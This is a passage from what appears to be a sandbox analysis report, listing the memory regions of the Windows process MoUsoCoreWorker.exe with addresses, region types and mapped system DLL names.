"\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4122 start_va = 0x17e0000 end_va = 0x19dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 4123 start_va = 0x1a60000 end_va = 0x1a60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a60000" filename = "" Region: id = 4124 start_va = 0x1a70000 end_va = 0x1a72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 4125 start_va = 0x1a90000 end_va = 0x1a99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 4126 start_va = 0x1aa0000 end_va = 0x1ae6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001aa0000" filename = "" Region: id = 4127 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4128 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 4129 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 4130 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 4131 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 4132 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4133 start_va = 0x7ff6b9ad0000 end_va = 0x7ff6b9c44fff monitored = 0 entry_point = 0x7ff6b9bc7850 region_type = mapped_file name = "mousocoreworker.exe" filename = "\\Windows\\System32\\MoUsoCoreWorker.exe" (normalized: "c:\\windows\\system32\\mousocoreworker.exe") Region: id = 4134 start_va = 0x7fffa9590000 end_va = 0x7fffa9672fff monitored = 0 entry_point = 0x7fffa95b2160 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 4135 start_va = 0x7fffae310000 end_va = 0x7fffae34ffff monitored = 0 entry_point = 0x7fffae337450 region_type = mapped_file name = "fcon.dll" filename = "\\Windows\\System32\\fcon.dll" (normalized: "c:\\windows\\system32\\fcon.dll") Region: id = 4136 start_va = 0x7fffaf150000 end_va = 0x7fffaf241fff monitored = 0 entry_point = 0x7fffaf168ad0 region_type = mapped_file name = "windows.security.authentication.onlineid.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.onlineid.dll") Region: id = 4137 start_va = 0x7fffb1820000 end_va = 0x7fffb1830fff monitored = 0 entry_point = 0x7fffb1826910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 4138 start_va = 0x7fffb3040000 end_va = 0x7fffb3070fff monitored = 0 entry_point = 0x7fffb304e9a0 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 4139 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4140 start_va = 0x7fffb4410000 end_va = 0x7fffb4453fff monitored = 0 entry_point = 0x7fffb442f4d0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 4141 start_va = 0x7fffb4460000 end_va = 0x7fffb4476fff monitored = 0 entry_point = 0x7fffb44681c0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 4142 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 4143 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4144 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4145 start_va = 0x7fffb54c0000 end_va = 0x7fffb55cffff monitored = 0 entry_point = 0x7fffb5573a20 region_type = mapped_file name = "windows.internal.signals.dll" filename = "\\Windows\\System32\\Windows.Internal.Signals.dll" (normalized: "c:\\windows\\system32\\windows.internal.signals.dll") Region: id = 4146 start_va = 0x7fffb9e50000 end_va = 0x7fffb9e58fff monitored = 0 entry_point = 0x7fffb9e51380 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 4147 start_va = 0x7fffba0f0000 end_va = 0x7fffba19efff monitored = 0 entry_point = 0x7fffba15f1c0 region_type = mapped_file name = "upshared.dll" filename = "\\Windows\\System32\\upshared.dll" (normalized: "c:\\windows\\system32\\upshared.dll") Region: id = 4148 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 4149 start_va = 0x7fffbadd0000 end_va = 0x7fffbae0efff monitored = 0 entry_point = 0x7fffbadf7d00 region_type = mapped_file name = "wosc.dll" filename = "\\Windows\\System32\\wosc.dll" (normalized: "c:\\windows\\system32\\wosc.dll") Region: id = 4150 start_va = 0x7fffbaf60000 end_va = 0x7fffbaf74fff monitored = 0 entry_point = 0x7fffbaf62930 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 4151 start_va = 0x7fffbb010000 end_va = 0x7fffbb035fff monitored = 0 entry_point = 0x7fffbb0172c0 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 4152 start_va = 0x7fffbdd20000 end_va = 0x7fffbddfafff monitored = 0 entry_point = 0x7fffbddc4140 region_type = mapped_file name = "winsqlite3.dll" filename = "\\Windows\\System32\\winsqlite3.dll" (normalized: "c:\\windows\\system32\\winsqlite3.dll") Region: id = 4153 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 0 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 4154 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 4155 start_va = 0x7fffbe610000 end_va = 0x7fffbe642fff monitored = 0 entry_point = 0x7fffbe62cfd0 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 4156 start_va = 0x7fffbe720000 end_va = 0x7fffbe756fff monitored = 0 entry_point = 0x7fffbe73ff00 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 4157 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 4158 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4159 start_va = 0x7fffbfbd0000 end_va = 0x7fffbfbd9fff monitored = 0 entry_point = 0x7fffbfbd14a0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4160 start_va = 0x7fffbfbe0000 end_va = 0x7fffbfc7cfff monitored = 0 entry_point = 0x7fffbfc14640 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4161 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4162 start_va = 0x7fffc0000000 end_va = 0x7fffc000bfff monitored = 0 entry_point = 0x7fffc0001430 region_type = mapped_file name = "waasmedicps.dll" filename = "\\Windows\\System32\\WaaSMedicPS.dll" (normalized: "c:\\windows\\system32\\waasmedicps.dll") Region: id = 4163 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4164 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4165 start_va = 0x7fffc17b0000 end_va = 0x7fffc17bafff monitored = 0 entry_point = 0x7fffc17b1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4166 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4167 start_va = 0x7fffc3550000 end_va = 0x7fffc355cfff monitored = 0 entry_point = 0x7fffc3554320 region_type = mapped_file name = "usocoreps.dll" filename = "\\Windows\\System32\\usocoreps.dll" (normalized: "c:\\windows\\system32\\usocoreps.dll") Region: id = 4168 start_va = 0x7fffc3560000 end_va = 0x7fffc3585fff monitored = 0 entry_point = 0x7fffc356ab40 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 4169 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 4170 start_va = 0x7fffc37f0000 end_va = 0x7fffc3818fff monitored = 0 entry_point = 0x7fffc37f9320 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4171 start_va = 0x7fffc51c0000 end_va = 0x7fffc526bfff monitored = 0 entry_point = 0x7fffc51de600 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4172 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4173 start_va = 0x7fffc65e0000 end_va = 0x7fffc66d4fff monitored = 0 entry_point = 0x7fffc6622860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4174 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4175 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4176 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4177 start_va = 0x7fffc8bf0000 end_va = 0x7fffc8d0afff monitored = 0 entry_point = 0x7fffc8bfc250 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 4178 start_va = 0x7fffc9150000 end_va = 0x7fffc91e0fff monitored = 0 entry_point = 0x7fffc9175d30 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4179 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4180 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 4181 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4182 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4183 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4184 start_va = 0x7fffc98a0000 end_va = 0x7fffc9909fff monitored = 0 entry_point = 0x7fffc98b0e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4185 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4186 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4187 start_va = 0x7fffc9ad0000 end_va = 0x7fffc9b29fff monitored = 0 entry_point = 0x7fffc9adb770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4188 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4189 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4190 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4191 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 4192 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4193 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4194 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4195 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4196 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4197 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4198 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 4199 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4200 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4201 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4202 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4203 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 4204 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4205 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4206 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4207 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4208 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4209 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4210 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4211 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4212 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4213 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4214 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4215 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4216 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4217 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4218 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4219 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4220 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4548 start_va = 0x7d0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 4619 start_va = 0x7d0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 4620 start_va = 0x7fffbc5b0000 end_va = 0x7fffbc64bfff monitored = 0 entry_point = 0x7fffbc617870 region_type = mapped_file name = "dcntel.dll" filename = "\\Windows\\System32\\dcntel.dll" (normalized: "c:\\windows\\system32\\dcntel.dll") Region: id = 4621 start_va = 0xf30000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 4622 start_va = 0x7fffc96b0000 end_va = 0x7fffc96f1fff monitored = 0 entry_point = 0x7fffc96ba3e0 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4623 start_va = 0x7fffc95d0000 end_va = 0x7fffc95dbfff monitored = 0 entry_point = 0x7fffc95d1ce0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4624 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4628 start_va = 0x7fffc34f0000 end_va = 0x7fffc350efff monitored = 0 entry_point = 0x7fffc34fe410 region_type = mapped_file name = "utcutil.dll" filename = "\\Windows\\System32\\utcutil.dll" (normalized: "c:\\windows\\system32\\utcutil.dll") Region: id = 4629 start_va = 0x7fffc8d70000 end_va = 0x7fffc8d98fff monitored = 0 entry_point = 0x7fffc8d71bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 4630 start_va = 0x7fffc8d40000 end_va = 0x7fffc8d64fff monitored = 0 entry_point = 0x7fffc8d43920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 4631 start_va = 0x7fffb57e0000 end_va = 0x7fffb57f7fff monitored = 0 entry_point = 0x7fffb57e1360 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4632 start_va = 0x7fffc6760000 end_va = 0x7fffc688ffff monitored = 0 entry_point = 0x7fffc67fdcf0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 4633 start_va = 0x7fffc34d0000 end_va = 0x7fffc34e1fff monitored = 0 entry_point = 0x7fffc34d9300 region_type = mapped_file name = "enrollmentapi.dll" filename = "\\Windows\\System32\\enrollmentapi.dll" (normalized: "c:\\windows\\system32\\enrollmentapi.dll") Region: id = 4634 start_va = 0x7fffab850000 end_va = 0x7fffab8f6fff monitored = 0 entry_point = 0x7fffab855ca0 region_type = mapped_file name = "dmenrollengine.dll" filename = "\\Windows\\System32\\dmenrollengine.dll" (normalized: "c:\\windows\\system32\\dmenrollengine.dll") Region: id = 4635 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4794 start_va = 0x19e0000 end_va = 0x1a5ffff monitored = 1 entry_point = 